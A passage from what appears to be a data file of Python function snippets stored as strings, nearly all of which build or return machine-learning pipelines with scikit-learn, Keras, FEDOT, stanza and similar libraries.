PrimaryNode('scaling')\n node_rf = SecondaryNode('rf', nodes_from=[node_scaling])\n node_logit = SecondaryNode('logit', nodes_from=[node_scaling])\n node_xgboost = SecondaryNode('xgboost', nodes_from=[node_logit, node_rf])\n pipeline = Pipeline(node_xgboost)\n return pipeline", "def get_model_from_dict(model_dict):\n\n pipe_list = []\n\n if 'transforms' in model_dict:\n # For basic scikit-learn transforms\n 
transforms = model_dict['transforms'].copy()\n if 'scaler' in transforms:\n scaler = transforms.pop('scaler')\n pipe_list.append(get_scaler(scaler))\n if 'pca' in transforms:\n transforms.pop('pca')\n pipe_list.append(get_pca())\n if 'poly' in transforms:\n args = transforms.pop('poly')\n pipe_list.append(get_poly(args))\n if len(transforms) > 0:\n raise Exception(\"unknown transforms: %s\" % repr(transforms))\n\n if 'args' in model_dict:\n model = get_model_class(model_dict['class'], model_dict['args'])\n else:\n model = get_model_class(model_dict['class'])\n\n if 'clusterregression' in model_dict:\n from empirical_lsm.clusterregression import ModelByCluster\n clusterer = model_dict['clusterregression']['class']\n cluster_args = model_dict['clusterregression']['args']\n model = ModelByCluster(\n get_clusterer(clusterer, cluster_args),\n model)\n\n pipe_list.append(model)\n\n pipe = make_pipeline(*pipe_list)\n\n if 'lag' in model_dict:\n params = model_dict['lag']\n pipe = get_lagger(pipe, params)\n elif 'markov' in model_dict:\n params = model_dict['markov']\n pipe = get_markov_wrapper(pipe, params)\n\n if 'forcing_vars' in model_dict:\n pipe.forcing_vars = model_dict['forcing_vars']\n else:\n logger.warning(\"Warning: no forcing vars, using defaults (all)\")\n pipe.forcing_vars = get_config(['vars', 'met'])\n\n if 'description' in model_dict:\n pipe.description = model_dict['description']\n\n return pipe", "def build(X, y=None):\n model = Pipeline([\n ('preprocessor',NLTKPreprocessor()),\n ('vectorizer', CountVectorizer()),\n ('tfidf', TfidfTransformer()),\n ('clf', OneVsRestClassifier(LinearSVC(C=0.9)))])\n\n model.fit(X, y)\n return model", "def model(self):\n return _model_from_quantity(self._sliced_components, mesh=self.mesh)", "def build_model(self):\n pipeline = Pipeline([\n ('vec', CountVectorizer(tokenizer=self.tokenize)),\n ('tfidf', TfidfTransformer()),\n ('clf', MultiOutputClassifier(RandomForestClassifier()))\n ])\n self.model = pipeline\n return pipeline", "def get_refinement_pipeline():\n node_scaling = PrimaryNode('scaling')\n node_logit = SecondaryNode('logit', nodes_from=[node_scaling])\n node_decompose = SecondaryNode('class_decompose', nodes_from=[node_logit, node_scaling])\n node_rfr = SecondaryNode('rfr', nodes_from=[node_decompose])\n node_xgboost = SecondaryNode('xgboost', nodes_from=[node_rfr, node_logit])\n\n pipeline = Pipeline(node_xgboost)\n return pipeline", "def get_preprocessing_pipeline(x):\n\n x = keras.layers.Cropping2D(cropping=((50, 20), (0, 0)))(x)\n\n # Poor man's resize, since using\n # x = keras.layers.Lambda(lambda data: tf.image.resize_images(data, size=(45, 160)))(x)\n # fails on model load...\n x = keras.layers.AveragePooling2D(pool_size=(2, 2))(x)\n x = keras.layers.Lambda(lambda data: data / 255)(x)\n\n return x", "def pipeline(self):\n # gotta avoid circular imports by deferring\n from .pipeline import Pipeline\n return Pipeline().from_source(self._collection)", "def pipeline(self) -> Pipeline:\n if self._to_pipeline is None:\n raise AttributeError(\n \"pipeline not available because `to_pipeline` was not set on __init__.\"\n )\n return self._to_pipeline(self)", "def create_pipeline_for_kfold(self, args):\n return ClassificationPipeline(args=args)", "def make_pipeline():\n \n # Base universe set to the QTradableStocksUS\n base_universe = QTradableStocksUS()#Q500US()\n base_universe = (base_universe & Q500US())\n base_universe = (base_universe & Fundamentals.market_cap.latest.top(150))\n \n # Factor of yesterday's close price.\n 
#yesterday_close = USEquityPricing.close.latest\n \n pipe = Pipeline(\n columns={\n #'close': yesterday_close,\n 'sector': Sector(),\n },\n screen=base_universe\n )\n return pipe", "def get_pipeline(features, to_matrix=True):\n feature_names = []\n for feature in features:\n feature_names += feature[1].FEATS\n if to_matrix:\n return Pipeline(features + [('transform', ToMatrix(features=feature_names)), ('norm', MinMaxScaler())])\n else:\n return Pipeline(features)", "def make_pipeline(sec_list, context):\n\n # Return Factors\n mask = SecurityInList()\n mask.securities = sec_list\n mask = mask.eq(1)\n yr_returns = Returns(window_length=context.return_period, mask=mask)\n sharpe = SharpeRatio(inputs=[yr_returns], window_length=context.return_period, mask=mask)\n\n pipe = Pipeline(\n screen=mask,\n columns={\n 'yr_returns': yr_returns, 'sharpe': sharpe\n }\n )\n return pipe", "def model(self):\n return self._fit_model()", "def pipeline(self):\n return self._pipeline", "def pipeline(self):\n return self._pipeline", "def build_model ( self, transformer, classifier, dumpfile ) :\n summitAIModel = make_pipeline ( transformer , classifier )\n summitAIModel.fit ( self.X , self.y )\n joblib.dump ( summitAIModel , dumpfile )", "def pipeline(args) :\n from pipeliner import create_pipeline\n create_pipeline(args)", "def build_pipeline():\n full_df = pd.read_csv(\"../data/healthcare-dataset-stroke-data.csv\",index_col = \"id\").drop(columns = [\"stroke\"],axis=1)\n #transform functions to make the pipeline work\n one_hot_encode_transformed = FunctionTransformer(one_hot_encode)\n impute_transformed = FunctionTransformer(impute)\n add_bodytype_transformed = FunctionTransformer(add_bodytype)\n add_diabetes_transformed = FunctionTransformer(add_diabetes)\n add_preexisting_transformed = FunctionTransformer(add_preexisting)\n add_missing_cols_transformed = FunctionTransformer(add_missing_cols,kw_args={\"total_tags\":get_all_tags(full_df)})\n pipeline = Pipeline([\n\n \n (\"add_bodytype\",add_bodytype_transformed),\n (\"add_diabetes\",add_diabetes_transformed),\n (\"add_preexisting\",add_preexisting_transformed),\n (\"impute\",impute_transformed),\n (\"one_hot_encode\",one_hot_encode_transformed),\n (\"add_missing_cols\",add_missing_cols_transformed),\n #use all available threads\n (\"over_under\" , SMOTEENN()),\n (\"pred\",XGBClassifier(nthread = -1,verbosity = 0,tree_method = 'gpu_hist',eval_metric = \"aucpr\",sampling_method = \"gradient_based\"))\n ])\n \n #set up parameters to test\n parameters = {\n\n 'pred__scale_pos_weight' : list(range(1,60,5)),\n 'over_under__sampling_strategy' : ['auto',0.1,0.2,0.3,0.4,0.5],\n \"pred__max_delta_step\": list(range(0,11))\n \n } \n \n grid = GridSearchCV(pipeline, param_grid=parameters,n_jobs = -1 ,scoring =\"average_precision\",verbose = 1)\n\n return grid", "def get_model(parameters):\n if MODEL == 6:\n return get_model_6(parameters)\n elif MODEL == 5:\n return get_model_5(parameters)\n elif MODEL == 4:\n return get_model_4(parameters)\n elif MODEL == 3:\n if CROSS_VALIDATION:\n return get_cv_model_3(parameters)\n else:\n return get_model_3(parameters)\n elif MODEL == 2:\n return get_model_2(parameters)\n else:\n return get_model_1(parameters)", "def build_model():\n pipeline = Pipeline([\n ('vect', CountVectorizer(tokenizer=tokenize)),\n ('tfidf', TfidfTransformer()),\n ('clf', MultiOutputClassifier(RandomForestClassifier()))\n ])\n \n parameters = {'clf__estimator__n_estimators': [50, 100],\n 'clf__estimator__min_samples_split': [2, 3, 5],\n 
'clf__estimator__criterion': ['entropy', 'gini']\n }\n \n cv = GridSearchCV(pipeline, param_grid=parameters)\n \n return cv", "def _get_pipeline(self, conf: Optional[float] = None, fuse_model: bool = True) -> PoseEstimationPipeline:\n if None in (self._edge_links, self._image_processor, self._default_nms_conf):\n raise RuntimeError(\n \"You must set the dataset processing parameters before calling predict.\\n\" \"Please call `model.set_dataset_processing_params(...)` first.\"\n )\n\n conf = conf or self._default_nms_conf\n\n if len(self._keypoint_colors) != self.num_joints:\n raise RuntimeError(\n \"The number of colors for the keypoints ({}) does not match the number of joints ({})\".format(len(self._keypoint_colors), self.num_joints)\n )\n if len(self._edge_colors) != len(self._edge_links):\n raise RuntimeError(\n \"The number of colors for the joints ({}) does not match the number of joint links ({})\".format(len(self._edge_colors), len(self._edge_links))\n )\n\n pipeline = PoseEstimationPipeline(\n model=self,\n image_processor=self._image_processor,\n edge_links=self._edge_links,\n edge_colors=self._edge_colors,\n keypoint_colors=self._keypoint_colors,\n post_prediction_callback=self.get_post_prediction_callback(conf=conf),\n fuse_model=fuse_model,\n )\n return pipeline", "def pipeline(self):\n return stanza.Pipeline(dir=TEST_MODELS_DIR, processors=\"tokenize,ner\")", "def to_sklearn(self):\n import sklearn.pipeline as skp\n\n steps = []\n for step in self.steps:\n steps += [(step[0], step[1].to_sklearn())]\n return skp.Pipeline(steps)", "def auto_ml():\r\n # Reading from file\r\n my_data = my_reader(config.filename, separ=config.file_separ)\r\n\r\n # Binary and Unary columns search\r\n is_binary_list = is_binary(my_data)\r\n is_unary_list = is_unary(my_data)\r\n\r\n # Time columns search\r\n is_time_list = is_time(my_data)\r\n\r\n # To dummy\r\n my_data = to_dummies(my_data)\r\n\r\n # Train-test split\r\n train_df, test_df = \\\r\n my_train_test_split(my_data, act_test_size=config.test_size)\r\n\r\n # Pure numbers will be the input variables\r\n input_vars = to_pure_numbers(my_data)\r\n\r\n # Choosing if it is a regression or classification\r\n global regression, classification\r\n regression, classification = guess_goal(my_data, config.target)\r\n\r\n # Modelling and building the pipeline\r\n n_neighbors = 15\r\n x_df = train_df[input_vars]\r\n if regression:\r\n pipe_1 = Pipeline([('missing', MissingValueHandle()),\r\n ('duplicated', DuplicatedRowHandle()),\r\n ('discretize', Digitize()),\r\n ('standardize', Standardize()),\r\n ('minmaxscaler', MyMinMaxScaler()),\r\n ('model', LinearRegression(fit_intercept=True))])\r\n pipe_2 = Pipeline([('missing', MissingValueHandle()),\r\n ('duplicated', DuplicatedRowHandle()),\r\n ('discretize', Digitize()),\r\n ('standardize', Standardize()),\r\n ('minmaxscaler', MyMinMaxScaler()),\r\n ('model',\r\n neighbors.KNeighborsRegressor(n_neighbors,\r\n weights='distance'))])\r\n pipe_3 = Pipeline([('missing', MissingValueHandle()),\r\n ('duplicated', DuplicatedRowHandle()),\r\n ('discretize', Digitize()),\r\n ('standardize', Standardize()),\r\n ('minmaxscaler', MyMinMaxScaler()),\r\n ('model', linear_model.BayesianRidge())])\r\n pipe_4 = Pipeline([('missing', MissingValueHandle()),\r\n ('duplicated', DuplicatedRowHandle()),\r\n ('discretize', Digitize()),\r\n ('standardize', Standardize()),\r\n ('minmaxscaler', MyMinMaxScaler()),\r\n ('model', linear_model.SGDRegressor())])\r\n pipe_5 = Pipeline([('missing', MissingValueHandle()),\r\n ('duplicated', 
DuplicatedRowHandle()),\r\n ('discretize', Digitize()),\r\n ('standardize', Standardize()),\r\n ('minmaxscaler', MyMinMaxScaler()),\r\n ('model', linear_model.ElasticNet())])\r\n pipe_6 = Pipeline([('missing', MissingValueHandle()),\r\n ('duplicated', DuplicatedRowHandle()),\r\n ('discretize', Digitize()),\r\n ('standardize', Standardize()),\r\n ('minmaxscaler', MyMinMaxScaler()),\r\n ('model', linear_model.Ridge())])\r\n pipe_7 = Pipeline([('missing', MissingValueHandle()),\r\n ('duplicated', DuplicatedRowHandle()),\r\n ('discretize', Digitize()),\r\n ('standardize', Standardize()),\r\n ('minmaxscaler', MyMinMaxScaler()),\r\n ('model', linear_model.Lasso())])\r\n pipe_8 = Pipeline([('missing', MissingValueHandle()),\r\n ('duplicated', DuplicatedRowHandle()),\r\n ('discretize', Digitize()),\r\n ('standardize', Standardize()),\r\n ('minmaxscaler', MyMinMaxScaler()),\r\n ('model', RandomForestRegressor(max_depth=2,\r\n random_state=0,\r\n n_estimators=100))])\r\n pipe_dict = {0: 'LinearRegression',\r\n 1: 'KNeighborsRegressor',\r\n 2: 'BayesianRidge',\r\n 3: 'SGDRegressor',\r\n 4: 'ElasticNet',\r\n 5: 'Ridge',\r\n 6: 'Lasso',\r\n 7: 'RandomForestRegressor'}\r\n\r\n if classification:\r\n pipe_1 = Pipeline([('missing', MissingValueHandle()),\r\n ('duplicated', DuplicatedRowHandle()),\r\n ('discretize', Digitize()),\r\n ('standardize', Standardize()),\r\n ('minmaxscaler', MyMinMaxScaler()),\r\n ('model', LogisticRegression(random_state=42))])\r\n pipe_2 = Pipeline([('missing', MissingValueHandle()),\r\n ('duplicated', DuplicatedRowHandle()),\r\n ('discretize', Digitize()),\r\n ('standardize', Standardize()),\r\n ('minmaxscaler', MyMinMaxScaler()),\r\n ('model',\r\n neighbors.KNeighborsClassifier(n_neighbors))])\r\n pipe_3 = Pipeline([('missing', MissingValueHandle()),\r\n ('duplicated', DuplicatedRowHandle()),\r\n ('discretize', Digitize()),\r\n ('standardize', Standardize()),\r\n ('minmaxscaler', MyMinMaxScaler()),\r\n ('model', RandomForestClassifier(n_estimators=100,\r\n max_depth=2,\r\n random_state=0))])\r\n pipe_4 = Pipeline([('missing', MissingValueHandle()),\r\n ('duplicated', DuplicatedRowHandle()),\r\n ('discretize', Digitize()),\r\n ('standardize', Standardize()),\r\n ('minmaxscaler', MyMinMaxScaler()),\r\n ('model', linear_model.SGDClassifier())])\r\n pipe_5 = Pipeline([('missing', MissingValueHandle()),\r\n ('duplicated', DuplicatedRowHandle()),\r\n ('discretize', Digitize()),\r\n ('standardize', Standardize()),\r\n ('minmaxscaler', MyMinMaxScaler()),\r\n ('model', MLPClassifier())])\r\n pipe_6 = Pipeline([('missing', MissingValueHandle()),\r\n ('duplicated', DuplicatedRowHandle()),\r\n ('discretize', Digitize()),\r\n ('standardize', Standardize()),\r\n ('minmaxscaler', MyMinMaxScaler()),\r\n ('model', GradientBoostingClassifier())])\r\n pipe_7 = Pipeline([('missing', MissingValueHandle()),\r\n ('duplicated', DuplicatedRowHandle()),\r\n ('discretize', Digitize()),\r\n ('standardize', Standardize()),\r\n ('minmaxscaler', MyMinMaxScaler()),\r\n ('model', GaussianNB())])\r\n pipe_8 = Pipeline([('missing', MissingValueHandle()),\r\n ('duplicated', DuplicatedRowHandle()),\r\n ('discretize', Digitize()),\r\n ('standardize', Standardize()),\r\n ('minmaxscaler', MyMinMaxScaler()),\r\n ('model', SVC(gamma='auto'))])\r\n pipe_dict = {0: 'LogisticRegression',\r\n 1: 'KNeighborsClassifier',\r\n 2: 'RandomForestClassifier',\r\n 3: 'SGDClassifier',\r\n 4: 'MLPClassifier',\r\n 5: 'GradientBoostingClassifier',\r\n 6: 'GaussianNB',\r\n 7: 'SVC'}\r\n\r\n # List of pipelines\r\n pipelines = [pipe_1, 
pipe_2, pipe_3, pipe_4, pipe_5, pipe_6, pipe_7, pipe_8]\r\n\r\n # Fit the pipelines\r\n for pipe in pipelines:\r\n pipe.fit(x_df, train_df[config.target])\r\n\r\n # Is there outlier\r\n outlier_bool = is_outlier(x_df)\r\n\r\n corr_df = x_df.corr()\r\n\r\n # Open new file\r\n result_path = './test_eval/Result_params_' +\\\r\n str(config.filename.split(\"/\")[-1].split(\".\")[0]) + '.txt'\r\n result_file = open(result_path, 'w')\r\n result_file.write(\"Filename: \" + str(config.filename) + '\\n')\r\n result_file.write(\"Target: \" + str(config.target) + '\\n')\r\n if regression:\r\n result_file.write(\"Prediction type: Regression\" + '\\n')\r\n else:\r\n result_file.write(\"Prediction type: Classification\" + '\\n')\r\n result_file.write(\"Test size: \" + str(config.test_size*100) + \"%\" + '\\n')\r\n result_file.write(\"Model input columns: \" + str(input_vars) + '\\n')\r\n result_file.write(\"Used preparations: \" + '\\n')\r\n if config.missing_bool:\r\n result_file.write(\"Missing value handle (\" +\r\n str(config. missing_value_handle) +\r\n \"), \")\r\n if config.min_scaler_bool:\r\n result_file.write(\"Min scaling, \")\r\n if config.standardize_bool:\r\n result_file.write(\"Standardize, \")\r\n if config.to_dummies:\r\n result_file.write(\"To dummies\")\r\n result_file.write('\\n' + \"Discretize columns: \" +\r\n str(config.discretize) + '\\n')\r\n result_file.write(\"Binary columns: \" + str(is_binary_list) + '\\n')\r\n result_file.write(\"Unary columns: \" + str(is_unary_list) + '\\n')\r\n result_file.write(\"Time columns: \" + str(is_time_list) + '\\n')\r\n if outlier_bool:\r\n result_file.write(\"There is outlier in the data.\" + '\\n')\r\n\r\n # Evaluation\r\n result_df = pd.DataFrame()\r\n result_cols = []\r\n for idx, val in enumerate(pipelines):\r\n result_df = pd.concat([result_df,\r\n my_evaluation(val.predict(test_df[input_vars]),\r\n test_df[config.target])])\r\n result_cols.append(pipe_dict[idx])\r\n\r\n result_df.index = result_cols\r\n result_file.close()\r\n\r\n with pd.ExcelWriter(\"./test_eval/Evaluation_\"\r\n + str(config.filename.split(\"/\")[-1].split(\".\")[0])\r\n + \".xlsx\") as writer:\r\n if regression:\r\n result_df.to_excel(writer, sheet_name=\"Regression\")\r\n else:\r\n result_df.to_excel(writer, sheet_name=\"Classification\")\r\n corr_df.to_excel(writer, sheet_name=\"Correlation\")", "def model_pipeline(catnums):\n pipe = make_pipeline(\n Imputer(strategy='most_frequent'),\n OneHotEncoder(categorical_features=catnums, sparse=False),\n PolynomialFeatures(),\n Ridge(alpha=25)\n )\n return pipe", "def build_model():\n #\n pipeline = Pipeline([\n ('features', FeatureUnion([\n ('text_pipeline', Pipeline([('vect', CountVectorizer(tokenizer=tokenize)),('tfidf', TfidfTransformer())])),\n ('starting_verb', StartingVerbExtractor())])),\n ('clf', RandomForestClassifier())\n ])\n \n # hyerparameters for grid to search within\n# parameters = [{'clf__bootstrap': [False, True],\n# 'clf__bootstrap': [False, True],\n# 'clf__n_estimators': [80,90, 100, 110, 130],\n# 'clf__max_features': [0.6, 0.65, 0.7, 0.73, 0.7500000000000001, 0.78, 0.8],\n# 'clf__min_samples_leaf': [10, 12, 14],\n# 'clf__min_samples_split': [3, 5, 7]\n# }\n# ]\n\n parameters = {\n 'features__text_pipeline__vect__ngram_range': ((1, 1), (1, 2)),\n 'features__text_pipeline__vect__max_df': (0.5, 0.75, 1.0),\n 'features__text_pipeline__vect__max_features': (None, 5000, 10000),\n 'features__text_pipeline__tfidf__use_idf': (True, False),\n 'clf__n_estimators': [50, 80, 90, 100, 200],\n 
'clf__min_samples_split': [2, 3, 4, 5, 7],\n 'features__transformer_weights': (\n {'text_pipeline': 1, 'starting_verb': 0.5},\n {'text_pipeline': 0.5, 'starting_verb': 1},\n {'text_pipeline': 0.8, 'starting_verb': 1},\n )\n }\n\n\n # Final model ready to be applied on dataset\n model = GridSearchCV(pipeline, param_grid=parameters)\n \n return model", "def build_model(): \n \n \n pipeline = Pipeline([('vect', CountVectorizer(tokenizer=tokenize)),('tfidf', TfidfTransformer()),\n ('MLC', MultiOutputClassifier(KNeighborsClassifier()))])\n \n parameters = {'MLC__estimator__n_neighbors': [3,5],'MLC__estimator__leaf_size':[10,20,30] }\n custom_recall = make_scorer(recall_score,average='weighted')\n\n cv = GridSearchCV(pipeline, param_grid = parameters, n_jobs = -1, verbose=2)\n\n\n return cv", "def build_model():\n # build pipeline with count vecotrizer, tfidf and support vector machine\n pipeline_SVC = Pipeline([\n ('vect', CountVectorizer(tokenizer = tokenize)),\n ('tfidf', TfidfTransformer()),\n ('multi-clf', MultiOutputClassifier(LinearSVC()))\n ])\n\n # define parameters for gridsearch\n parameters_SVC = {\n 'vect__max_df': (.6, 1),\n 'tfidf__norm': ('l1', 'l2'),\n 'multi-clf__estimator__C': (.1, 1, 100)\n }\n\n # build parameter grid and fit data\n model = GridSearchCV(pipeline_SVC, parameters_SVC)\n\n return model", "def get_cb_pipeline(train):\n from src.features import alchemy_feat, counting_feat, nltk_feat\n features = [\n ('sentiment', alchemy_feat.Sentiment()),\n ('sent_len', counting_feat.SentenceLength()),\n ('tfidf', counting_feat.BagOfTfIDF(train)),\n ('ner', alchemy_feat.NER()),\n ('pos', nltk_feat.POS())\n ]\n return get_pipeline(features)", "def _create_pipeline(self) -> codepipeline.Pipeline:\n source_output = codepipeline.Artifact()\n build_output = codepipeline.Artifact()\n return codepipeline.Pipeline(\n self,\n 'Pipeline',\n stages=[\n self._create_source_stage('Source', source_output),\n # self._create_image_build_stage(\n # 'Build', source_output, build_output),\n # self._create_deploy_stage('Deploy', build_output)\n ]\n )", "def build_model():\n pipeline = Pipeline([\n ('vect', CountVectorizer(tokenizer = tokenize, min_df = 5)),\n ('tfidf', TfidfTransformer(use_idf = True)),\n ('clf', MultiOutputClassifier(RandomForestClassifier(n_estimators = 10,\n min_samples_split = 10)))\n ])\n\n # Create parameters dictionary\n parameters = {'vect__min_df': [1, 5],\n 'tfidf__use_idf':[True, False],\n 'clf__estimator__n_estimators':[10, 25],\n 'clf__estimator__min_samples_split':[2, 5, 10]}\n\n # create grid search\n cv = GridSearchCV(pipeline, param_grid=parameters)\n\n return cv", "def get_preprocessing_model(image_size):\n\n expected_image_size = (160, 320, 3)\n\n if image_size != expected_image_size:\n raise ValueError(\"Expected image size is {}, but {} was given\".format(expected_image_size, image_size))\n\n input = keras.layers.Input(shape=image_size)\n x = get_preprocessing_pipeline(input)\n\n model = keras.models.Model(input=input, output=x)\n return model", "def __init__(self):\n # self.model = get_pretrained_model()\n self.tokenizer = get_tokenizer()\n self.model = transformers.Trainer(model=get_pretrained_model())\n self.summarizer = pipeline(\"summarization\") # ~1.2 GB download the first time this is run.", "def build_model():\n # Pipeline of CountVextorizer, TfdifTransformer and MultiOutputClassifier\n pipeline = Pipeline([\n ('vect', CountVectorizer(tokenizer=tokenize)),\n ('tfidf', TfidfTransformer()),\n ('clf', MultiOutputClassifier(RandomForestClassifier()))\n 
])\n \n parameters = {'clf__estimator__n_estimators': [50, 30],\n 'clf__estimator__min_samples_split': [3, 2] \n }\n \n cv = GridSearchCV(pipeline, param_grid= parameters, verbose=2, n_jobs=4)\n return cv", "def __build_ml_pipeline(self, clf: MultiOutputClassifier) -> Pipeline:\r\n pipeline = Pipeline([\r\n ('features', FeatureUnion(\r\n [('text', Pipeline(\r\n [('text_field_extractor', \r\n basic_utils.TextFieldExtractor('message')), \r\n #('vect', CountVectorizer(tokenizer=clean_text)),\r\n #('tfidf', TfidfTransformer())\r\n ('tfidf', TfidfVectorizer(tokenizer=basic_utils.tokenize, \r\n min_df=.0025, max_df=0.25, \r\n ngram_range=(1,2)))\r\n ])),\r\n \r\n ('numerics', FeatureUnion(\r\n [('text_len', \r\n Pipeline([('text_len_extractor', \r\n basic_utils.NumericFieldExtractor('text_len')), \r\n ('text_len_scaler', StandardScaler())\r\n ])),\r\n ('punt_perc', \r\n Pipeline([('punt_perc_extractor', \r\n basic_utils.NumericFieldExtractor('punt_perc')), \r\n ('punt_perc_scaler', StandardScaler())\r\n ]))\r\n ])),\r\n ('starting_verb', basic_utils.PosFieldExtractor('starting_verb_flag'))\r\n ])),\r\n \r\n ('clf', clf)\r\n ])\r\n \r\n return pipeline", "def main_modeling_pipeline():\n\n\n data_df = pd.read_csv('gs://aiplatformfilipegracio2020/head_train_data.csv')\n data_df = data_df[[LABEL, 'price', 'days_on_site']]\n\n class_weights = calculate_class_weights(data_df[LABEL])\n print('class weights', class_weights)\n logging.info('Data loaded and processed')\n train_ds, val_ds, test_ds = make_tf_datasets(data_df, LABEL)\n logging.info('Tensorflow datasets created')\n\n with strategy.scope():\n logging.info('Inside strategy')\n simple_feature_layer = make_simple_feature_layer(data_df)\n logging.info('Going to make model')\n simple_model = make_simple_model(simple_feature_layer)\n\n logging.info('Going fit model')\n simple_model_results, simple_model = model_fit_and_evaluate(model=simple_model,\n train_ds=train_ds,\n val_ds=val_ds,\n test_ds=test_ds,\n class_weights=class_weights,\n epochs=TRAINING_EPOCHS,\n job_name='simple_model')\n\n simple_model.save('gs://aiplatformfilipegracio2020/')", "def build_model():\n pipeline = Pipeline([\n ('vect', CountVectorizer(tokenizer=tokenize)),\n ('tfidf', TfidfTransformer()),\n ('clf', MultiOutputClassifier(LogisticRegression(random_state=2020), n_jobs=-1))\n ])\n\n parameters = {\n 'clf__estimator__C': [1, 2, 4],\n 'clf__estimator__penalty': ['l1', 'l2']\n }\n\n cv = GridSearchCV(pipeline, param_grid=parameters, cv=5)\n\n return cv", "def spacy_pipeline() -> spacy.language.Language:\n context = get_spacy_pipeline()\n assert context is not None\n return context", "def get_model():\r\n model = Sequential([\r\n\r\n Lambda(normalize, input_shape=(66, 200, 3)),\r\n\r\n Convolution2D(16, (3, 3), padding='same', activation='relu', strides=2),\r\n Convolution2D(16, (3, 3), padding='same', activation='relu', strides=1),\r\n Convolution2D(24, (3, 3), padding='same', activation='relu', strides=1),\r\n MaxPooling2D(pool_size=(3, 3)),\r\n\r\n Convolution2D(24, (3, 3), padding='same', activation='relu', strides=1),\r\n Convolution2D(32, (3, 3), padding='same', activation='relu', strides=1),\r\n MaxPooling2D(pool_size=(3, 3)),\r\n\r\n Convolution2D(32, (3, 3), padding='same', activation='relu', strides=1),\r\n Convolution2D(48, (3, 3), padding='same', activation='relu', strides=1),\r\n MaxPooling2D(pool_size=(3, 3)),\r\n\r\n Convolution2D(48, (3, 3), padding='same', activation='relu', strides=1),\r\n Convolution2D(32, (3, 3), padding='same', activation='relu', 
strides=1),\r\n Convolution2D(24, (3, 3), padding='same', activation='relu', strides=2),\r\n Convolution2D(1, (3, 3), padding='same', activation='relu', strides=2),\r\n Flatten(),\r\n\r\n\r\n ])\r\n\r\n model.compile(optimizer='adam', loss='mse', metrics=['accuracy'])\r\n return model", "def read(cls):\n return PipelineJavaMLReader(cls, \"com.ibm.analytics.wml.pipeline.spark.MLPipeline\")", "def export_pipeline(scikit_pipeline):\n steps_obj = {'steps':[]}\n for name, md in scikit_pipeline.steps:\n steps_obj['steps'].append({\n 'name': name,\n 'class_name': fullname(md),\n 'params': md.get_params()\n })\n\n return steps_obj", "def model_pipeline_run(index, model, params, X_train, y_train, X_test, y_test, model_name, pre_process_time, type):\n n_jobs = -1\n n_iter = 100\n if model is None:\n return\n try:\n row = {\"dataset_index\": index}\n if type == \"classification\":\n steps = [(\"classifier\", model)]\n else:\n steps = [(\"regressor\", model)]\n pipeline = MLPipeline(steps=steps)\n if type == \"classification\":\n if model_name == \"rf\":\n params[\"classifier__max_features\"] = [min([x, X_train.shape[1]]) for x in\n params[\"classifier__max_features\"]]\n elif \"dl\" in model_name:\n n_jobs = None\n params[\"classifier__shape\"] = [X_train.shape[1]]\n if isinstance(y_test[0], (str)):\n try:\n y_train = np.asarray(list(map(lambda x: int(re.search(\"[0-9]+\", x).group()), y_train)))\n y_test = np.asarray(list(map(lambda x: int(re.search(\"[0-9]+\", x).group()), y_test)))\n except Exception as e:\n le = LabelEncoder()\n y_train = le.fit_transform(y_train)\n y_test = le.transform(y_test)\n grid = RandomizedSearchCV(estimator=pipeline, param_distributions=params, cv=KFold(3), refit=True,\n verbose=0, n_jobs=n_jobs, n_iter=n_iter,\n scoring=\"f1\" if len(set(y_train)) == 2 else \"f1_weighted\")\n else:\n if model_name == \"rf\":\n params[\"regressor__max_features\"] = [min([x, X_train.shape[1]]) for x in\n params[\"regressor__max_features\"]]\n elif \"dl\" in model_name:\n n_jobs = None\n params[\"regressor__shape\"] = [X_train.shape[1]]\n grid = RandomizedSearchCV(estimator=pipeline, param_distributions=params, cv=KFold(3), refit=True,\n verbose=0, n_jobs=n_jobs, n_iter=n_iter, error_score=np.nan)\n model_time = time.time()\n columns = X_train.columns\n if \"dl-rnn\" in model_name:\n X_train = np.reshape(X_train.astype(\"float32\").values, (X_train.shape[0], 1, X_train.shape[1]))\n X_test = np.reshape(X_test.astype(\"float32\").values, (X_test.shape[0], 1, X_test.shape[1]))\n else:\n X_train = X_train.astype(\"float32\").values\n X_test = X_test.astype(\"float32\").values\n grid = grid.fit(X_train.astype(\"float32\"), y_train)\n row[\"time\"] = (time.time() - model_time) / 60\n row[\"pre_process_time\"] = pre_process_time\n return scoring(grid, X_train, X_test, y_train, y_test, columns, row=row, model_name=model_name, type=type)\n except Exception as e:\n print(e)", "def pipeline(self):\n return stanza.Pipeline(dir=TEST_MODELS_DIR, processors=\"tokenize,ner\", package={\"ner\": [\"ncbi_disease\", \"ontonotes\"]})", "def create_pipelines_lingspam():\n stop = ('stop', StopWordRemovalTransformer())\n lemma = ('lemma', LemmatizeTransformer())\n binz = ('binarizer', CountVectorizer())\n we = ('document embedding', DocEmbeddingVectorizer())\n sel = ('fsel', SelectKBest(score_func=mutual_info_classif, k=100))\n clf = ('cls', BernoulliNB()) # Binary features in the original paper. 
\n return Pipeline([binz, sel, clf]), \\\n Pipeline([stop, binz, sel, clf]), \\\n Pipeline([lemma, binz, sel, clf]), \\\n Pipeline([stop, lemma, binz, sel, clf]), \\\n Pipeline([stop, lemma, we, sel, clf])", "def _make_pipeline(preprocessors, classifier):\n if isinstance(preprocessors, list):\n # support only preprocessing of lenght 2\n return make_pipeline(preprocessors[0], preprocessors[1], classifier)\n if preprocessors is None:\n return make_pipeline(classifier)\n\n return make_pipeline(preprocessors, classifier)", "def run(self):\n self.pipeline = self.set_pipeline()\n self.pipeline.fit(self.X,self.y)\n return self", "def build_model():\n \n pipelineRFC = Pipeline([('vect', CountVectorizer(tokenizer=tokenize)),\n ('tfidf', TfidfTransformer()),\n ('clf', MultiOutputClassifier(RandomForestClassifier()))])\n \n param = {\n 'clf__estimator__n_estimators': [10, 50]\n }\n \n gscv = GridSearchCV(pipelineRFC, param_grid=param, verbose=15)\n return gscv", "def pipeline(self):\n steps = [('DummyDefense', DummyDefense()),\n ('DummyClassifier', DummyClassifier())]\n return Pipeline(steps)", "def s2s_model(self):\r\n \r\n model = AttentionSeq2Seq(input_dim=self.input_dim, input_length=self.input_len, \r\n hidden_dim=16, output_length=self.output_len, \r\n output_dim=self.output_dim, depth=(1,1),\r\n stateful=False, dropout=0.5)\r\n model.compile(loss='mape', optimizer='adam', metrics=['mse'])\r\n model.fit(self.train_X, self.train_Y, epochs=75, verbose=2, shuffle=True)\r\n\r\n return model", "def get_model(summary=False):\n\timage_input=Input(shape=(220,220,5),name='image_input')\n\tbranch1_conv1=Conv2D(64, kernel_size=(3, 3), border_mode='same', input_shape=(220,220,5), 